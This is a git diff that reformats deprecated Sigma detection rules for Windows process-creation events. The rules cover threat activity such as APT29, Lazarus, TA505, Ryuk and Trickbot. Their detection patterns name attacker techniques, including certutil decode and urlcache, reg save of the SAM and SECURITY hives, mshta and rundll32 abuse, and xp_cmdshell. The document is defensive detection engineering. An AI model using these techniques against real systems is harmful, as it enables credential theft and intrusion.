https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7 diff --git a/sigma/builtin/deprecated/powershell_suspicious_invocation_specific.yml b/sigma/builtin/deprecated/powershell_suspicious_invocation_specific.yml index d7ffcd16f..394405215 100644 --- a/sigma/builtin/deprecated/powershell_suspicious_invocation_specific.yml +++ b/sigma/builtin/deprecated/powershell_suspicious_invocation_specific.yml @@ -11,8 +11,7 @@ modified: 2023/05/04 logsource: product: windows service: powershell - definition: Script block logging must be enabled for 4104, Module Logging must - be enabled for 4103 + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 detection: powershell: Channel: diff --git a/sigma/builtin/deprecated/powershell_syncappvpublishingserver_exe.yml b/sigma/builtin/deprecated/powershell_syncappvpublishingserver_exe.yml index 42710d97d..5fd87989c 100644 --- a/sigma/builtin/deprecated/powershell_syncappvpublishingserver_exe.yml +++ b/sigma/builtin/deprecated/powershell_syncappvpublishingserver_exe.yml @@ -1,13 +1,12 @@ title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299 related: - - id: fde7929d-8beb-4a4c-b922-be9974671667 - type: derived -description: Detects SyncAppvPublishingServer process execution which usually utilized - by adversaries to bypass PowerShell execution restrictions. + - id: fde7929d-8beb-4a4c-b922-be9974671667 + type: derived +description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. references: - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ -author: "Ensar \u015Eamil, @sblmsrsn, OSCD Community" +author: Ensar Şamil, @sblmsrsn, OSCD Community date: 2020/10/05 modified: 2022/04/11 tags: diff --git a/sigma/builtin/deprecated/proc_creation_win_apt_apt29_thinktanks.yml b/sigma/builtin/deprecated/proc_creation_win_apt_apt29_thinktanks.yml index fc498a037..5ddfecdfc 100644 --- a/sigma/builtin/deprecated/proc_creation_win_apt_apt29_thinktanks.yml +++ b/sigma/builtin/deprecated/proc_creation_win_apt_apt29_thinktanks.yml @@ -1,8 +1,7 @@ title: APT29 id: 033fe7d6-66d1-4240-ac6b-28908009c71f status: deprecated -description: This method detects a suspicious PowerShell command line combination - as used by APT29 in a campaign against U.S. think tanks. +description: This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks. references: - https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/ - https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html @@ -21,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - -noni - -ep - bypass diff --git a/sigma/builtin/deprecated/proc_creation_win_apt_dragonfly.yml b/sigma/builtin/deprecated/proc_creation_win_apt_dragonfly.yml index 89b336eff..59a96c931 100644 --- a/sigma/builtin/deprecated/proc_creation_win_apt_dragonfly.yml +++ b/sigma/builtin/deprecated/proc_creation_win_apt_dragonfly.yml @@ -22,7 +22,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \crackmapexec.exe + NewProcessName|endswith: \crackmapexec.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/deprecated/proc_creation_win_apt_gallium.yml b/sigma/builtin/deprecated/proc_creation_win_apt_gallium.yml index 3654f3224..f86863770 100644 --- a/sigma/builtin/deprecated/proc_creation_win_apt_gallium.yml +++ b/sigma/builtin/deprecated/proc_creation_win_apt_gallium.yml @@ -1,11 +1,10 @@ title: GALLIUM Artefacts id: 18739897-21b1-41da-8ee4-5b786915a676 related: - - id: 440a56bf-7873-4439-940a-1c8a671073c2 - type: derived + - id: 440a56bf-7873-4439-940a-1c8a671073c2 + type: derived status: deprecated -description: Detects artefacts associated with activity group GALLIUM - Microsoft - Threat Intelligence Center indicators released in December 2019. +description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. references: - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11) @@ -25,7 +24,7 @@ detection: EventID: 4688 Channel: Security legitimate_process_path: - NewProcessName|contains: + NewProcessName|contains: - :\Program Files(x86)\ - :\Program Files\ legitimate_executable: diff --git a/sigma/builtin/deprecated/proc_creation_win_apt_hurricane_panda.yml b/sigma/builtin/deprecated/proc_creation_win_apt_hurricane_panda.yml index 07aeb0351..83edbab98 100644 --- a/sigma/builtin/deprecated/proc_creation_win_apt_hurricane_panda.yml +++ b/sigma/builtin/deprecated/proc_creation_win_apt_hurricane_panda.yml @@ -19,11 +19,11 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|contains|all: - - localgroup - - admin - - /add - - CommandLine|contains: \Win64.exe + - CommandLine|contains|all: + - localgroup + - admin + - /add + - CommandLine|contains: \Win64.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml b/sigma/builtin/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml index 278eb994e..749980cca 100644 --- a/sigma/builtin/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml +++ b/sigma/builtin/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml @@ -1,8 +1,7 @@ title: Lazarus Activity Apr21 id: 4a12fa47-c735-4032-a214-6fab5b120670 status: deprecated -description: Detects different process creation events as described in Malwarebytes's - threat report on Lazarus group activity +description: Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity references: - https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/ author: Bhabesh Raj @@ -20,15 +19,15 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains|all: - - mshta + CommandLine|contains|all: + - mshta # Covered by cc7abbd0-762b-41e3-8a26-57ad50d2eea3 - .zip selection_2: ParentProcessName: C:\Windows\System32\wbem\wmiprvse.exe - NewProcessName: C:\Windows\System32\mshta.exe + NewProcessName: C:\Windows\System32\mshta.exe selection_3: ParentProcessName|contains: :\Users\Public\ - NewProcessName: C:\Windows\System32\rundll32.exe + NewProcessName: C:\Windows\System32\rundll32.exe condition: process_creation and (1 of selection_*) falsepositives: - Should not be any false positives diff --git a/sigma/builtin/deprecated/proc_creation_win_apt_lazarus_loader.yml b/sigma/builtin/deprecated/proc_creation_win_apt_lazarus_loader.yml index cb7881bf6..3c8c6a8a4 100644 --- a/sigma/builtin/deprecated/proc_creation_win_apt_lazarus_loader.yml +++ b/sigma/builtin/deprecated/proc_creation_win_apt_lazarus_loader.yml @@ -1,8 +1,7 @@ title: Lazarus Loaders id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e status: deprecated -description: Detects different loaders as described in various threat reports on Lazarus - group activity +description: Detects different loaders as described in various threat reports on Lazarus group activity references: - https://www.hvs-consulting.de/lazarus-report/ - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/ @@ -21,27 +20,26 @@ detection: EventID: 4688 Channel: Security selection_cmd1: - CommandLine|contains|all: + CommandLine|contains|all: - 'cmd.exe /c ' - ' -p 0x' selection_cmd2: - CommandLine|contains: + CommandLine|contains: - C:\ProgramData\ - C:\RECYCLER\ selection_rundll1: - CommandLine|contains|all: + CommandLine|contains|all: - 'rundll32.exe ' - C:\ProgramData\ selection_rundll2: - CommandLine|contains: + CommandLine|contains: - .bin, - .tmp, - .dat, - .io, - .ini, - .db, - condition: process_creation and (( selection_cmd1 and selection_cmd2 ) or ( selection_rundll1 - and selection_rundll2 )) + condition: process_creation and (( selection_cmd1 and selection_cmd2 ) or ( selection_rundll1 and selection_rundll2 )) falsepositives: - Unknown level: critical diff --git a/sigma/builtin/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml b/sigma/builtin/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml index 6c968d98e..39a87378d 100644 --- a/sigma/builtin/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml +++ b/sigma/builtin/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml @@ -19,8 +19,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: DataExchange.dll - NewProcessName|endswith: + CommandLine|contains: DataExchange.dll + NewProcessName|endswith: - \powershell.exe - \pwsh.exe ParentProcessName|endswith: \excel.exe diff --git a/sigma/builtin/deprecated/proc_creation_win_apt_ta505_dropper.yml b/sigma/builtin/deprecated/proc_creation_win_apt_ta505_dropper.yml index 5b129bb99..7597ea71b 100644 --- a/sigma/builtin/deprecated/proc_creation_win_apt_ta505_dropper.yml +++ b/sigma/builtin/deprecated/proc_creation_win_apt_ta505_dropper.yml @@ -1,8 +1,7 @@ title: TA505 Dropper Load Pattern id: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4 status: deprecated -description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious - documents +description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents references: - https://twitter.com/ForensicITGuy/status/1334734244120309760 author: Florian Roth (Nextron Systems) @@ -22,8 +21,8 @@ detection: selection_parent: ParentProcessName|endswith: \wmiprvse.exe selection_mshta: - - NewProcessName|endswith: \mshta.exe - - OriginalFileName: mshta.exe + - NewProcessName|endswith: \mshta.exe + - OriginalFileName: mshta.exe condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/deprecated/proc_creation_win_certutil_susp_execution.yml b/sigma/builtin/deprecated/proc_creation_win_certutil_susp_execution.yml index f4053c3e4..3a2274af6 100644 --- a/sigma/builtin/deprecated/proc_creation_win_certutil_susp_execution.yml +++ b/sigma/builtin/deprecated/proc_creation_win_certutil_susp_execution.yml @@ -1,8 +1,7 @@ title: Suspicious Certutil Command Usage id: e011a729-98a6-4139-b5c4-bf6f6dd8239a status: deprecated -description: Detects a suspicious Microsoft certutil execution with sub commands like - 'decode' sub command, which is sometimes used to decode malicious code +description: Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code references: - https://twitter.com/JohnLaTwC/status/835149808817991680 - https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/ @@ -32,10 +31,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - NewProcessName|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -decode ' - ' -decodehex ' - ' -urlcache ' @@ -53,7 +52,6 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: high ruletype: Sigma diff --git a/sigma/builtin/deprecated/proc_creation_win_cmd_read_contents.yml b/sigma/builtin/deprecated/proc_creation_win_cmd_read_contents.yml index 896ac64c1..2dcd3b134 100644 --- a/sigma/builtin/deprecated/proc_creation_win_cmd_read_contents.yml +++ b/sigma/builtin/deprecated/proc_creation_win_cmd_read_contents.yml @@ -18,17 +18,17 @@ detection: EventID: 4688 Channel: Security selection_cmd: - - OriginalFileName: Cmd.Exe - - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe selection_read: - - ParentCommandLine|contains|all: - - cmd - - '/r ' - - < - - CommandLine|contains|all: - - cmd - - '/r ' - - < + - ParentCommandLine|contains|all: + - cmd + - '/r ' + - < + - CommandLine|contains|all: + - cmd + - '/r ' + - < condition: process_creation and (all of selection_*) falsepositives: - Legitimate use diff --git a/sigma/builtin/deprecated/proc_creation_win_cmd_redirect_to_stream.yml b/sigma/builtin/deprecated/proc_creation_win_cmd_redirect_to_stream.yml index e97dd5056..b92f4aded 100644 --- a/sigma/builtin/deprecated/proc_creation_win_cmd_redirect_to_stream.yml +++ b/sigma/builtin/deprecated/proc_creation_win_cmd_redirect_to_stream.yml @@ -1,8 +1,7 @@ title: Cmd Stream Redirection id: 70e68156-6571-427b-a6e9-4476a173a9b6 status: deprecated -description: Detects the redirection of an alternate data stream (ADS) of / within - a Windows command line session +description: Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt author: frack113 @@ -19,12 +18,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - '> ' - ':' - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe filter: - CommandLine|contains: ' :\' + CommandLine|contains: ' :\' condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/builtin/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml b/sigma/builtin/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml index 35cbc2dcf..b4bb7dbcc 100644 --- a/sigma/builtin/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml +++ b/sigma/builtin/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml @@ -18,14 +18,14 @@ detection: EventID: 4688 Channel: Security selection_1: - - NewProcessName|endswith: \reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: \reg.exe + - OriginalFileName: reg.exe selection_2: - CommandLine|contains: + CommandLine|contains: - ' save ' - ' export ' selection_3: - CommandLine|contains: + CommandLine|contains: - hklm\sam - hklm\security - HKEY_LOCAL_MACHINE\SAM diff --git a/sigma/builtin/deprecated/proc_creation_win_cscript_vbs.yml b/sigma/builtin/deprecated/proc_creation_win_cscript_vbs.yml index 3ec6e7f66..c3eed9b02 100644 --- a/sigma/builtin/deprecated/proc_creation_win_cscript_vbs.yml +++ b/sigma/builtin/deprecated/proc_creation_win_cscript_vbs.yml @@ -18,14 +18,14 @@ detection: EventID: 4688 Channel: Security selection_exe: - - OriginalFileName: - - cscript.exe - - wscript.exe - - NewProcessName|endswith: - - \cscript.exe - - \wscript.exe + - OriginalFileName: + - cscript.exe + - wscript.exe + - NewProcessName|endswith: + - \cscript.exe + - \wscript.exe selection_script: - CommandLine|contains: .vbs + CommandLine|contains: .vbs condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml b/sigma/builtin/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml index ab4ad99fe..cde31411b 100644 --- a/sigma/builtin/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml +++ b/sigma/builtin/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml @@ -1,14 +1,12 @@ title: Execution via MSSQL Xp_cmdshell Stored Procedure id: 344482e4-a477-436c-aa70-7536d18a48c7 related: - - id: d08dd86f-681e-4a00-a92c-1db218754417 - type: derived - - id: 7f103213-a04e-4d59-8261-213dddf22314 - type: derived + - id: d08dd86f-681e-4a00-a92c-1db218754417 + type: derived + - id: 7f103213-a04e-4d59-8261-213dddf22314 + type: derived status: deprecated -description: Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users - may attempt to elevate their privileges by using xp_cmdshell, which is disabled - by default. +description: Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default. references: - https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html author: Tim Rauch @@ -25,8 +23,8 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_parent: ParentProcessName|endswith: \sqlservr.exe condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/deprecated/proc_creation_win_indirect_cmd.yml b/sigma/builtin/deprecated/proc_creation_win_indirect_cmd.yml index b43cf6d47..afc86af29 100644 --- a/sigma/builtin/deprecated/proc_creation_win_indirect_cmd.yml +++ b/sigma/builtin/deprecated/proc_creation_win_indirect_cmd.yml @@ -1,8 +1,7 @@ title: Indirect Command Execution id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 status: deprecated -description: Detect indirect command execution via Program Compatibility Assistant - (pcalua.exe or forfiles.exe). +description: Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe). references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1202/T1202.md - https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html @@ -30,8 +29,7 @@ fields: - ParentCommandLine - CommandLine falsepositives: - - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers - as opposed to commonly seen artifacts. + - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts. - Legitimate usage of scripts. level: low ruletype: Sigma diff --git a/sigma/builtin/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml b/sigma/builtin/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml index e7400f147..0610cf5b6 100644 --- a/sigma/builtin/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml +++ b/sigma/builtin/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml @@ -1,16 +1,14 @@ title: Indirect Command Exectuion via Forfiles id: a85cf4e3-56ee-4e79-adeb-789f8fb209a8 related: - - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 - type: obsoletes + - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 + type: obsoletes status: deprecated -description: Detects execition of commands and binaries from the context of "forfiles.exe". - This can be used as a LOLBIN in order to bypass application whitelisting. +description: Detects execition of commands and binaries from the context of "forfiles.exe". This can be used as a LOLBIN in order to bypass application whitelisting. references: - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-73d61931b2c77fde294189ce5d62323b416296a7c23ea98a608f425566538d1a - https://lolbas-project.github.io/lolbas/Binaries/Forfiles/ -author: Tim Rauch (rule), Elastic (idea), E.M. Anhaus (originally from Atomic Blue - Detections, Endgame), oscd.community +author: Tim Rauch (rule), Elastic (idea), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community date: 2022/10/17 modified: 2023/01/04 tags: @@ -38,10 +36,10 @@ detection: - ' /m ' - ' -m ' filter: - CommandLine|contains|all: + CommandLine|contains|all: - xcopy - cmd /c del - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe condition: process_creation and (all of selection_* and not filter) falsepositives: - Unknown diff --git a/sigma/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml b/sigma/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml index dbc723e5c..6d53806a4 100644 --- a/sigma/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml +++ b/sigma/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml @@ -3,7 +3,7 @@ id: 056a7ee1-4853-4e67-86a0-3fd9ceed7555 status: deprecated description: Detects Obfuscated Powershell via RUNDLL LAUNCHER references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 23) author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2023/02/21 @@ -20,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32.exe - shell32.dll - shellexec_rundll diff --git a/sigma/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml b/sigma/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml index 33dcef79f..557299157 100644 --- a/sigma/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml +++ b/sigma/builtin/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml @@ -20,12 +20,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - '&&' - rundll32 - shell32.dll - shellexec_rundll - CommandLine|contains: + CommandLine|contains: - value - invoke - comspec diff --git a/sigma/builtin/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml b/sigma/builtin/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml index d0fc2f226..53f8e6361 100644 --- a/sigma/builtin/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml +++ b/sigma/builtin/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml @@ -1,8 +1,7 @@ title: Monitoring Wuauclt.exe For Lolbas Execution Of DLL id: ba1bb0cb-73da-42de-ad3a-de10c643a5d0 status: experimental -description: Adversaries can abuse wuauclt.exe (Windows Update client) to run code - execution by specifying an arbitrary DLL. +description: Adversaries can abuse wuauclt.exe (Windows Update client) to run code execution by specifying an arbitrary DLL. references: - https://dtm.uk/wuauclt/ author: Sreeman @@ -16,12 +15,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - wuauclt.exe - /UpdateDeploymentProvider - /Runhandlercomserver filter: - CommandLine|contains: + CommandLine|contains: - wuaueng.dll - UpdateDeploymentProvider.dll /ClassId condition: process_creation and (selection and not filter) diff --git a/sigma/builtin/deprecated/proc_creation_win_lolbin_findstr.yml b/sigma/builtin/deprecated/proc_creation_win_lolbin_findstr.yml index 3c829348b..cc138bcd9 100644 --- a/sigma/builtin/deprecated/proc_creation_win_lolbin_findstr.yml +++ b/sigma/builtin/deprecated/proc_creation_win_lolbin_findstr.yml @@ -1,8 +1,7 @@ title: Abusing Findstr for Defense Evasion id: bf6c39fc-e203-45b9-9538-05397c1b4f3f status: deprecated -description: Attackers can use findstr to hide their artifacts or search specific - strings and evade defense mechanism +description: Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism references: - https://lolbas-project.github.io/lolbas/Binaries/Findstr/ - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ @@ -24,27 +23,26 @@ detection: EventID: 4688 Channel: Security selection_findstr: - - CommandLine|contains: findstr - - NewProcessName|endswith: findstr.exe - - OriginalFileName: FINDSTR.EXE + - CommandLine|contains: findstr + - NewProcessName|endswith: findstr.exe + - OriginalFileName: FINDSTR.EXE selection_cli_download_1: - CommandLine|contains: + CommandLine|contains: - ' /v ' - ' -v ' selection_cli_download_2: - CommandLine|contains: + CommandLine|contains: - ' /l ' - ' -l ' selection_cli_creds_1: - CommandLine|contains: + CommandLine|contains: - ' /s ' - ' -s ' selection_cli_creds_2: - CommandLine|contains: + CommandLine|contains: - ' /i ' - ' -i ' - condition: process_creation and (selection_findstr and (all of selection_cli_download* - or all of selection_cli_creds*)) + condition: process_creation and (selection_findstr and (all of selection_cli_download* or all of selection_cli_creds*)) falsepositives: - Administrative findstr usage level: medium diff --git a/sigma/builtin/deprecated/proc_creation_win_lolbin_office.yml b/sigma/builtin/deprecated/proc_creation_win_lolbin_office.yml index 918a4e359..776dc82c5 100644 --- a/sigma/builtin/deprecated/proc_creation_win_lolbin_office.yml +++ b/sigma/builtin/deprecated/proc_creation_win_lolbin_office.yml @@ -1,8 +1,7 @@ title: Suspicious File Download Using Office Application id: 0c79148b-118e-472b-bdb7-9b57b444cc19 status: test -description: Detects the usage of one of three Microsoft office applications (Word, - Excel, PowerPoint) to download arbitrary files +description: Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/ - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/ @@ -22,8 +21,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: http - NewProcessName|endswith: + CommandLine|contains: http + NewProcessName|endswith: - \powerpnt.exe - \winword.exe - \excel.exe diff --git a/sigma/builtin/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml b/sigma/builtin/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml index 99034af28..7641db507 100644 --- a/sigma/builtin/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml +++ b/sigma/builtin/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml @@ -19,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: /fullmemdmp - NewProcessName|endswith: \rdrleakdiag.exe + CommandLine|contains: /fullmemdmp + NewProcessName|endswith: \rdrleakdiag.exe selection2: - CommandLine|contains|all: + CommandLine|contains|all: - /fullmemdmp - ' /o ' - ' /p ' diff --git a/sigma/builtin/deprecated/proc_creation_win_lolbins_by_office_applications.yml b/sigma/builtin/deprecated/proc_creation_win_lolbins_by_office_applications.yml index 9ecd13ca4..4dad5de5e 100644 --- a/sigma/builtin/deprecated/proc_creation_win_lolbins_by_office_applications.yml +++ b/sigma/builtin/deprecated/proc_creation_win_lolbins_by_office_applications.yml @@ -1,8 +1,7 @@ title: New Lolbin Process by Office Applications id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8 status: deprecated -description: This rule will monitor any office apps that spins up a new LOLBin process. - This activity is pretty suspicious and should be investigated. +description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e @@ -10,8 +9,7 @@ references: - https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml - https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A - https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set -author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock - @securepeacock (Update), SCYTHE @scythe_io (Update) +author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock @securepeacock (Update), SCYTHE @scythe_io (Update) date: 2021/08/23 modified: 2023/02/04 tags: @@ -24,11 +22,12 @@ logsource: product: windows category: process_creation detection: + #useful_information: add more LOLBins to the rules logic of your choice. process_creation: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: + NewProcessName|endswith: - \regsvr32.exe - \rundll32.exe - \msiexec.exe diff --git a/sigma/builtin/deprecated/proc_creation_win_mal_ryuk.yml b/sigma/builtin/deprecated/proc_creation_win_mal_ryuk.yml index 03b601edb..a1027ebb6 100644 --- a/sigma/builtin/deprecated/proc_creation_win_mal_ryuk.yml +++ b/sigma/builtin/deprecated/proc_creation_win_mal_ryuk.yml @@ -1,8 +1,8 @@ title: Ryuk Ransomware Command Line Activity id: 0acaad27-9f02-4136-a243-c357202edd74 related: - - id: c37510b8-2107-4b78-aa32-72f251e7a844 - type: similar + - id: c37510b8-2107-4b78-aa32-72f251e7a844 + type: similar status: deprecated description: Detects Ryuk Ransomware command lines references: @@ -21,12 +21,12 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: stop - NewProcessName|endswith: + CommandLine|contains: stop + NewProcessName|endswith: - \net.exe - \net1.exe selection2: - CommandLine|contains: + CommandLine|contains: - samss - audioendpointbuilder - unistoresvc_ diff --git a/sigma/builtin/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml b/sigma/builtin/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml index 79e8917c7..74518c7cb 100644 --- a/sigma/builtin/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml +++ b/sigma/builtin/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml @@ -1,12 +1,10 @@ title: Trickbot Malware Reconnaissance Activity id: 410ad193-a728-4107-bc79-4419789fcbf8 related: - - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 - type: similar + - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 + type: similar status: deprecated -description: Detects potential reconnaissance activity used by Trickbot malware. Trickbot - enumerates domain/network topology and executes certain commands automatically - every few minutes. +description: Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes. references: - https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/ - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/ @@ -24,9 +22,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: /domain_trusts /all_trusts + CommandLine|contains: /domain_trusts /all_trusts ParentProcessName|endswith: \cmd.exe - NewProcessName|endswith: \nltest.exe + NewProcessName|endswith: \nltest.exe condition: process_creation and selection falsepositives: - Rare System Admin Activity diff --git a/sigma/builtin/deprecated/proc_creation_win_mavinject_proc_inj.yml b/sigma/builtin/deprecated/proc_creation_win_mavinject_proc_inj.yml index 9db811396..891295519 100644 --- a/sigma/builtin/deprecated/proc_creation_win_mavinject_proc_inj.yml +++ b/sigma/builtin/deprecated/proc_creation_win_mavinject_proc_inj.yml @@ -20,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: ' /INJECTRUNNING ' + CommandLine|contains: ' /INJECTRUNNING ' condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/deprecated/proc_creation_win_msdt_diagcab.yml b/sigma/builtin/deprecated/proc_creation_win_msdt_diagcab.yml index b55e3365b..47767c955 100644 --- a/sigma/builtin/deprecated/proc_creation_win_msdt_diagcab.yml +++ b/sigma/builtin/deprecated/proc_creation_win_msdt_diagcab.yml @@ -1,8 +1,7 @@ title: Execute MSDT.EXE Using Diagcab File id: 6545ce61-a1bd-4119-b9be-fcbee42c0cf3 